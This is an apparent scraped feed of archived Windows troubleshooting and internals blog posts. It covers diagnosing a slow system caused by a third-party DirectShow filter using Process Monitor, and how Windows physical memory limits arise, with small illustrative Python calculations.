I ran it, but it came up empty: </P> <BR /> <P> <IMG alt="image" border="0" height="114" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121060iD28E4706750906C1" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="427" /> </P> <BR /> <P> I checked the Roxio web site just to be sure and it turned out there was a newer version that the built-in updater hadn't offered, perhaps because the update, according to the page, didn't offer anything new: </P> <BR /> <P> <IMG alt="image" border="0" height="242" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image19_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image19_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121061iC14C53EC16ECD362" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="637" /> </P> <BR /> <P> I downloaded it anyway (all 640MB of it!) and waited the 15 or so minutes for it to install. 
Then I checked the version information of Sonicmp4demux.ax to see if it was newer, but its version number, 1.4.402.60802, was the same as the one I'd seen in the DLL view and the file was two years old: </P> <BR /> <P> <IMG alt="image" border="0" height="140" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_5.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121062iBAE4BA47DE2C4B9D" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="494" /> </P> <BR /> <P> I could have uninstalled the software, which would ensure that the problem wouldn't return, but I wanted to keep Roxio for its DVD authoring functionality. I didn't care if I didn't get thumbnails for Roxio-specific image formats - I wasn't even sure there were any I'd ever see in Explorer - so I set out to see if I could disable just the Sonic demultiplexer. I could have searched the Registry for the DLL name, which is surely where it was registered, but that's a brute-force approach and if there were indirect or multiple references I could easily end up disabling more than just its thumbnail generation and possibly breaking something in Windows. </P> <BR /> <P> <A href="#" mce_href="#" target="_blank"> Process Monitor </A> was the perfect tool for the job. 
Because I didn't know when the problem might reoccur - it might take days to reproduce - I didn't want to just run it and let it consume all available virtual memory or disk space, so I set the History Depth in the Options menu to have Process Monitor retain only the most recent 1 million events: </P> <BR /> <P> <IMG alt="image" border="0" height="133" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121063i6564B5E374FD2BB1" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="348" /> </P> <BR /> <P> I also set an Include filter for paths matching C:\Windows\System32\Dllhost.exe, minimized it, and let my wife have the system back. </P> <BR /> <P> The next day I came home from work, sat down at the computer and saw from Process Explorer that Dllhost.exe was back at it, consuming 50% of the CPU. I suspect that because it's a dual-core system, the problem had been showing up regularly, but my wife hadn't noticed it because the remaining CPU capacity was enough to mask it (another good reason to buy multi-core processors!). I brought Process Monitor to the foreground and noted it had seen 114,000 Dllhost operations, which was obviously way too many to scan through individually. 
I searched for "sonicmp4" and found a reference in a Registry query near the end of the trace: </P> <BR /> <P> <IMG alt="image" border="0" height="74" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121064iCD48A04C5D7EC4C5" width="550" /> </P> <BR /> <P> The query is of a COM object registration for the demultiplexer. Because the COM object is a 3rd-party DLL, I was certain that that COM Class ID (CLSID) isn't hard-coded into Windows, so I went back to the first entry in the trace and searched for "A7DD215", the first few characters of the CLSID. The search found a match a few thousand operations earlier: </P> <BR /> <P> <IMG alt="image" border="0" height="113" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121065i30383E3D723384D4" width="550" /> </P> <BR /> <P> The CLSID was in the name of a Registry key under another COM object registration. I Windows-Live-searched (that just rolls off the tongue, doesn't it?) 
for the parent CLSID and found this KB article that explains that the registry key is where <A href="#" mce_href="#" target="_blank"> DirectShow </A> filters register: <A href="#" mce_href="#" title="http://msdn.microsoft.com/en-us/library/ms787560(VS.85).aspx" target="_blank"> http://msdn.microsoft.com/en-us/library/ms787560(VS.85).aspx </A> I took a look at the stack for the particular query to confirm that's the reason Dllhost was reading from there: </P> <BR /> <P> <IMG alt="image" border="0" height="332" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121066i52C45F8FFB4D73B9" width="382" /> </P> <BR /> <P> I was now confident that I could simply rename the Sonic filter registration key to prevent its use. I never delete registry keys when performing this kind of troubleshooting just in case the change disables important functionality or somehow breaks something else. I had seen from the traces that the thumbnail cache generator had come across an AVI file that caused it to load the Sonic demultiplexer, a format Windows is obviously able to handle on its own, so I was pretty sure things would continue to work. After terminating the Dllhost and making the change, I browsed to the same folder, deleted the thumbnails, and confirmed that there was no reduced functionality as far as I could tell. I then used Roxio to successfully burn a DVD with a number of AVI files. This case was closed. </P> <BR /> <P> My wife's system was now usable again, and though I wasn't able to close the Flash-related part of the case, at least I knew the cause and could keep an eye out for updates. 
More importantly, by solving the Dllhost part of the case, even if Flash went crazy again, her system would still be usable and she wouldn't be filing a critical support incident for it with me - thanks to Process Explorer and Process Monitor. </P> </BODY></HTML> Thu, 27 Jun 2019 06:44:21 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slooooow-system/ba-p/723708 MarkRussinovich 2019-06-27T06:44:21Z Where in the World is Mark Russinovich? https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/where-in-the-world-is-mark-russinovich/ba-p/723675 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 08, 2008 </STRONG> <BR /> <P> I haven't had a chance to write a new post in a while because I've been busy working on Windows, new Sysinternals tools and enhancements to existing ones, and the 5th edition of Windows Internals, so I thought that I'd update you on my speaking schedule, book status, and what's going on at Sysinternals. </P> <P> My next event is one that anyone can easily attend live, or via recorded webcast: it's the third virtual roundtable in the Microsoft Springboard series of round tables I've been hosting. <A href="#" target="_blank"> Springboard </A> is a program designed to connect IT pros with practical information, guidance and tools to help them in their evaluation and deployment of Windows without marketing fluff getting in the way. This next round table is on September 24 and takes on the topic of performance. As usual, we'll have a panel of MVPs and customers sharing their experiences and real world tips with you. You can sign up to watch it live and find the contact to send in your questions ahead of time <A href="#" target="_blank"> here </A> . 
</P> <P> In addition to the round table, I've got a full conference schedule for the Fall, including three keynotes: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd Hong Kong </A> , October 8-10, Wanchai, Hong Kong </P> <P> <A href="#" target="_blank"> Virtualization Congress </A> , October 15-16, London, UK </P> <P> <A href="#" target="_blank"> Microsoft Platforma </A> , December 4-5, Moscow, Russia </P> </BLOCKQUOTE> <P> I'm also returning to one of my favorite conferences, TechEd EMEA IT Pros. I love reconnecting with my speaker friends, the enthusiastic European attendees, and Barcelona. I'm delivering several sessions, including an updated " <A href="#" target="_blank"> The Case of the Unexplained... </A> ", complete with all new examples. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd EMEA IT Pro </A> , November 3-7, Barcelona, Spain </P> </BLOCKQUOTE> <P> I hope to see you at one of these events, and if you attend one of my sessions please stop by and say hello. </P> <P> The book, which is updated to focus exclusively on Windows Vista and Windows Server 2008, is well along and we're on track for publication in January. I'm writing it again with <A href="#" target="_blank"> David Solomon </A> , my coauthor on the previous two editions, and <A href="#" target="_blank"> Alex Ionescu </A> , who is new to this edition and contributing great content. With all the new information and experiments, the book is going to be around 250 pages longer, making its bed-time reading value stretch even longer. You can find information on the book on its official home page <A href="#" target="_blank"> here </A> . </P> <P> Finally, Bryce and I have some exciting Sysinternals updates, including a major Process Monitor update and enhancements to Process Explorer, planned for release in the coming weeks and months. 
</P> <P> If you'd like to hear directly from me on what I'm up to at Microsoft, what's behind the Sysinternals operation, what new feature we're releasing in Process Monitor, and my views on Windows, operating system security, and more, check out my recent <A href="#" target="_blank"> interview with TechNet Edge </A> . </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:42:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/where-in-the-world-is-mark-russinovich/ba-p/723675 MarkRussinovich 2019-06-27T06:42:23Z Pushing the Limits of Windows: Physical Memory https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-physical-memory/ba-p/723674 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 21, 2008 </STRONG> <BR /> <P> </P> <P> This is the first blog post in a series I'll write over the coming months called Pushing the Limits of Windows that describes how Windows and applications use a particular resource, the licensing and implementation-derived limits of the resource, how to measure the resource’s usage, and how to diagnose leaks. To be able to manage your Windows systems effectively you need to understand how Windows manages physical resources, such as CPUs and memory, as well as logical resources, such as virtual memory, handles, and window manager objects. Knowing the limits of those resources and how to track their usage enables you to attribute resource usage to the applications that consume them, effectively size a system for a particular workload, and identify applications that leak resources. </P> <P> Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. 
</P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <H3> Physical Memory </H3> <P> One of the most fundamental resources on a computer is physical memory. Windows' memory manager is responsible for populating memory with the code and data of active processes, device drivers, and the operating system itself. Because most systems access more code and data than can fit in physical memory as they run, physical memory is in essence a window into the code and data used over time. The amount of memory can therefore affect performance, because when data or code a process or the operating system needs is not present, the memory manager must bring it in from disk. </P> <P> Besides affecting performance, the amount of physical memory impacts other resource limits. For example, the amount of non-paged pool, operating system buffers backed by physical memory, is obviously constrained by physical memory. Physical memory also contributes to the system virtual memory limit, which is roughly the sum of the size of physical memory and the maximum configured size of any paging files. Physical memory can also indirectly limit the maximum number of processes, which I'll talk about in a future post on process and thread limits. 
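</P> <P> As a rough illustration of the system virtual memory limit described above, the following sketch simply adds physical memory to the maximum size of each paging file. The function name and the example sizes are hypothetical, and the result is only the approximation the text describes, not the exact value Windows computes. </P>

```python
GIB = 1024 ** 3  # bytes per GB, using binary units


def approx_system_virtual_memory_limit(physical_bytes, max_pagefile_bytes):
    """Approximate the limit as RAM plus the maximum size of every paging file."""
    return physical_bytes + sum(max_pagefile_bytes)


# Hypothetical system: 4GB of RAM and two paging files capped at 6GB and 2GB.
limit = approx_system_virtual_memory_limit(4 * GIB, [6 * GIB, 2 * GIB])
print(f"Approximate system virtual memory limit: {limit / GIB:.1f} GB")
```

<P> Raising the maximum paging file size raises this approximate limit without adding RAM, which is why the limit depends on configuration as well as hardware. 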
</P> <H3> Windows Server Memory Limits </H3> <P> Windows support for physical memory is dictated by hardware limitations, licensing, operating system data structures, and driver compatibility. The <A href="#" target="_blank"> Memory Limits for Windows Releases </A> page in MSDN documents the limits for different Windows versions, and within a version, by SKU. </P> <P> You can see physical memory support licensing differentiation across the server SKUs for all versions of Windows. For example, the 32-bit version of Windows Server 2008 Standard supports only 4GB, while the 32-bit Windows Server 2008 Datacenter supports 64GB. Likewise, the 64-bit Windows Server 2008 Standard supports 32GB and the 64-bit Windows Server 2008 Datacenter can handle a whopping 2TB. There aren't many 2TB systems out there, but the Windows Server Performance Team knows of a couple, including one they had in their lab at one point. Here's a screenshot of Task Manager running on that system: </P> <P> <IMG alt="image" border="0" height="451" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121037i8A1A9892115C2119" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="566" /> </P> <P> The maximum 32-bit limit of 128GB, supported by Windows Server 2003 Datacenter Edition, comes from the fact that structures the Memory Manager uses to track physical memory would consume too much of the system's virtual address space on larger systems. The Memory Manager keeps track of each page of memory in an array called the PFN database and, for performance, it maps the entire PFN database into virtual memory. Because it represents each page of memory with a 28-byte data structure, the PFN database on a 128GB system (32M pages of 4KB each) requires about 896MB. 
32-bit Windows has a 4GB virtual address space defined by hardware that it splits by default between the currently executing user-mode process (e.g. Notepad) and the system. 896MB therefore consumes almost half the available 2GB of system virtual address space, leaving only about 1GB for mapping the kernel, device drivers, system cache and other system data structures, making that a reasonable cut off: </P> <P> <IMG alt="image" border="0" height="240" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_3E55/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121038i10B7969ABC196455" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="300" /> </P> <P> That's also why the memory limits table lists lower limits for the same SKUs when booted with 4GB tuning (called 4GT and enabled with the Boot.ini's /3GB or /USERVA, and Bcdedit's /Set IncreaseUserVa boot options), because 4GT moves the split to give 3GB to user mode and leave only 1GB for the system. For improved performance, Windows Server 2008 reserves more for system address space by lowering its maximum 32-bit physical memory support to 64GB. </P> <P> The Memory Manager could accommodate more memory by mapping pieces of the PFN database into the system address space as needed, but that would add complexity and possibly reduce performance with the added overhead of map and unmap operations. It's only recently that systems have become large enough for that to be considered, but because the system address space is not a constraint for mapping the entire PFN database on 64-bit Windows, support for more memory is left to 64-bit Windows. </P> <P> The maximum 2TB limit of 64-bit Windows Server 2008 Datacenter doesn't come from any implementation or hardware limitation, but Microsoft will only support configurations they can test. 
As of the release of Windows Server 2008, the largest system available anywhere was 2TB and so Windows caps its use of physical memory there. </P> <H3> Windows Client Memory Limits </H3> <P> 64-bit Windows client SKUs support different amounts of memory as a SKU-differentiating feature, ranging from 512MB for Windows XP Starter to 128GB for Vista Ultimate and 192GB for Windows 7 Ultimate. All 32-bit Windows client SKUs, however, including Windows Vista, Windows XP and Windows 2000 Professional, support a maximum of 4GB of physical memory. 4GB is the highest physical address accessible with the standard x86 memory management mode. Originally, there was no need to even consider support for more than 4GB on clients because that amount of memory was rare, even on servers. </P> <P> However, by the time Windows XP SP2 was under development, client systems with more than 4GB were foreseeable, so the Windows team started broadly testing Windows XP on systems with more than 4GB of memory. Windows XP SP2 also enabled Physical Address Extensions (PAE) support by default on hardware that implements no-execute memory because it's required for Data Execution Prevention (DEP), but that also enables support for more than 4GB of memory. </P> <P> What they found was that many of the systems would crash, hang, or become unbootable because some device drivers, commonly those for video and audio devices that are found typically on clients but not servers, were not programmed to expect physical addresses larger than 4GB. As a result, the drivers truncated such addresses, resulting in memory corruptions and corruption side effects. Server systems commonly have more generic devices with simpler and more stable drivers, and therefore hadn't generally surfaced these problems. The problematic client driver ecosystem led to the decision for client SKUs to ignore physical memory that resides above 4GB, even though they can theoretically address it. 
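</P> <P> To make the truncation problem concrete, here is a minimal sketch of what happens when a physical address above 4GB is squeezed into a 32-bit variable. It is an illustration only, not code from any real driver, and the buffer address is a made-up example. </P>

```python
MASK_32 = 0xFFFFFFFF  # the bits that survive in a 32-bit variable
FOUR_GB = 1 << 32     # first physical address above the 4GB boundary


def truncate_to_32_bits(physical_address):
    """Model a driver that stores a physical address in a 32-bit field."""
    return physical_address & MASK_32


# Hypothetical buffer located 512MB above the 4GB line.
buffer_address = FOUR_GB + 0x2000_0000
seen_by_driver = truncate_to_32_bits(buffer_address)
print(f"real address:   {buffer_address:#x}")
print(f"driver's value: {seen_by_driver:#x}")
```

<P> The truncated value still looks like a valid address, just one that belongs to unrelated memory below 4GB, so a device that reads or writes there corrupts whatever happens to live at that location. Addresses below 4GB pass through unchanged, which is why such drivers appeared to work on smaller systems. 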
</P> <H3> 32-bit Client Effective Memory Limits </H3> <P> While 4GB is the licensed limit for 32-bit client SKUs, the effective limit is actually lower and dependent on the system's chipset and connected devices. The reason is that the physical address map includes not only RAM, but device memory as well, and x86 and x64 systems map all device memory below the 4GB address boundary to remain compatible with 32-bit operating systems that don't know how to handle addresses larger than 4GB. If a system has 4GB RAM and devices, like video, audio and network adapters, that implement windows into their device memory that sum to 500MB, 500MB of the 4GB of RAM will reside above the 4GB address boundary, as seen below: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121039i7E8269B9271C660F" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="256" /> </P> <P> The result is that, if you have a system with 3GB or more of memory and you are running a 32-bit Windows client, you may not be getting the benefit of all of the RAM.&nbsp; On Windows 2000, Windows XP and Windows Vista RTM, you can see how much RAM Windows has accessible to it in the System Properties dialog, Task Manager's Performance page, and, on Windows XP and Windows Vista (including SP1), in the Msinfo32 and Winver utilities. On Windows Vista SP1, some of these locations changed to show installed RAM, rather than available RAM, as documented in this <A href="#" target="_blank"> Knowledge Base article </A> . 
</P> <P> On my 4GB laptop, when booted with 32-bit Vista, the amount of physical memory available is 3.5GB, as seen in the Msinfo32 utility: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121040i7A1417E484652CAA" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="274" /> </P> <P> You can see physical memory layout with the <A href="#" target="_blank"> Meminfo </A> tool by <A href="#" target="_blank"> Alex Ionescu </A> (who's contributing to the 5th Edition of the <A href="#" target="_blank"> Windows Internals </A> that I'm coauthoring with <A href="#" target="_blank"> David Solomon </A> ). Here's the output of Meminfo when I run it on that system with the -r switch to dump physical memory ranges: </P> <P> <IMG alt="image" border="0" height="151" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121041i4AA3C3702DCF35A4" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Note the gap in the memory address range from page 9F000 to page 100000, and another gap from DFE6D000 to FFFFFFFF (4GB). 
However, when I boot that system with 64-bit Vista, all 4GB show up as available and you can see how Windows uses the remaining 500MB of RAM that are above the 4GB boundary: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121042i40E3EAD02D59A9AF" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> What's occupying the holes below 4GB? The Device Manager can answer that question. To check, launch "devmgmt.msc", select Resources by Connection in the View Menu, and expand the Memory node. On my laptop, the primary consumer of mapped device memory is, unsurprisingly, the video card, which consumes 256MB in the range E0000000-EFFFFFFF: </P> <P> <IMG alt="image" border="0" height="222" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121043i50E52B9758F5B8B3" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Other miscellaneous devices account for most of the rest, and the PCI bus reserves additional ranges for devices as part of the conservative estimation the firmware uses during boot. </P> <P> The consumption of memory addresses below 4GB can be drastic on high-end gaming systems with large video cards. For example, I purchased one from a boutique gaming rig company that came with 4GB of RAM and two 1GB video cards. I hadn't specified the OS version and assumed that they'd put 64-bit Vista on it, but it came with the 32-bit version and as a result only 2.2GB of the memory was accessible by Windows. 
You can see a giant memory hole from 8FEF0000 to FFFFFFFF in this Meminfo output from the system after I installed 64-bit Windows: </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121044i698749E2C1A1F3D2" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Device Manager reveals that 512MB of the roughly 1.75GB hole is for the video cards (256MB each), and it looks like the firmware has reserved the rest either for dynamic mappings or because it was conservative in its estimate: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121045i26EFB039D1FD4324" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Even systems with as little as 2GB can be prevented from having all their memory usable under 32-bit Windows because of chipsets that aggressively reserve memory regions for devices. 
Our shared family computer, which we purchased only a few months ago from a major OEM, reports that only 1.97GB of the 2GB installed is available: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121046iA45FC4F0A8121F2F" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="281" /> </P> <P> The physical address range from 7E700000 to FFFFFFFF is reserved by the PCI bus and devices, which leaves a theoretical maximum of 7E700000 bytes (1.976GB) of physical address space, but even some of that is reserved for device memory, which explains why Windows reports 1.97GB. </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121047iD4B5FA50BB9AD4CE" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="439" /> </P> <P> Because device vendors now have to submit both 32-bit and 64-bit drivers to Microsoft's Windows Hardware Quality Laboratories (WHQL) to obtain a driver signing certificate, the majority of device drivers today can probably handle physical addresses above the 4GB line. However, 32-bit Windows will continue to ignore memory above it because there is still some difficult to measure risk, and OEMs are (or at least should be) moving to 64-bit Windows where it's not an issue. 
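</P> <P> The hole boundaries quoted in this section can be checked with a little arithmetic. The sketch below converts the starting address of each device hole into an upper bound on the RAM a 32-bit client can use, on the assumption that the hole runs from that address up to the 4GB boundary. The function name and system labels are mine, and the result is only an upper bound because some addresses below the hole are reserved as well. </P>

```python
GIB = 1 << 30  # bytes per GB, using binary units


def ram_below_hole_gb(hole_start):
    """Upper bound, in GB, on RAM addressable below a hole that begins at hole_start."""
    return hole_start / GIB


# Hole start addresses taken from the Meminfo and Device Manager discussion above.
systems = [
    ("4GB laptop", 0xDFE6D000),
    ("gaming system", 0x8FEF0000),
    ("family computer", 0x7E700000),
]

for label, hole_start in systems:
    print(f"{label}: at most {ram_below_hole_gb(hole_start):.3f} GB usable below the hole")
```

<P> The three results land close to the 3.5GB, 2.2GB and 1.97GB that Windows reports on those systems, which is consistent with the device hole, rather than the amount of installed RAM, setting the effective limit. 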
</P> <P> The bottom line is that you can fully utilize your system's memory (up to the SKU's limit) with 64-bit Windows, regardless of the amount, and if you are purchasing a high-end gaming system you should definitely ask the OEM to put 64-bit Windows on it at the factory. </P> <H3> Do You Have Enough Memory? </H3> <P> Regardless of how much memory your system has, the question is, is it enough? Unfortunately, there's no hard and fast rule that allows you to know with certainty. There is a general guideline you can use that's based on monitoring the system's "available" memory over time, especially when you're running memory-intensive workloads. Windows defines available memory as physical memory that's not assigned to a process, the kernel, or device drivers. As its name implies, available memory is available for assignment to a process or the system if required. The Memory Manager of course tries to make the most of that memory by using it as a file cache (the standby list), as well as for zeroed memory (the zero page list), and Vista's Superfetch feature prefetches data and code into the standby list and prioritizes it to favor data and code likely to be used in the near future. </P> <P> If available memory becomes scarce, that means that processes or the system are actively using physical memory, and if it remains close to zero over extended periods of time, you can probably benefit by adding more memory. There are a number of ways to track available memory. On Windows Vista, you can indirectly track available memory by watching the Physical Memory Usage History in Task Manager, looking for it to remain close to 100% over time. 
Here's a screenshot of Task Manager on my 8GB desktop system (hmm, I think I might have too much memory!): </P> <P> <IMG alt="image" border="0" height="285" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121048i87B78C52C2AA4D6E" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="428" /> </P> <P> On all versions of Windows you can graph available memory using the Performance Monitor by adding the Available Bytes counter in the Memory performance counter group: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121049iA3715C835EBE4A7C" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="411" /> </P> <P> You can see the instantaneous value in <A href="#" target="_blank"> Process Explorer's </A> System Information dialog, or, on versions of Windows prior to Vista, on Task Manager's Performance page. </P> <H3> Pushing the Limits of Windows </H3> <P> Out of CPU, memory and disk, memory is typically the most important for overall system performance. The more, the better. 64-bit Windows is the way to go to be sure that you're taking advantage of all of it, and 64-bit Windows can have other performance benefits that I'll talk about in a future Pushing the Limits blog post when I talk about virtual memory limits. 
</P> </BODY></HTML> Thu, 27 Jun 2019 06:42:18 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-physical-memory/ba-p/723674 MarkRussinovich 2019-06-27T06:42:18Z The Case of the Random IE and WMP Crashes https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-and-wmp-crashes/ba-p/723654 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 02, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When I experienced a crash in Internet Explorer (IE) on my home 64-bit gaming system one day, I chalked it up to random third-party plug-in memory corruption. I moved on, but a few days later had another crash in IE. Then, Windows Media Player (WMP) started crashing every third or fourth time I used it: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="393" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064673/original.aspx" 
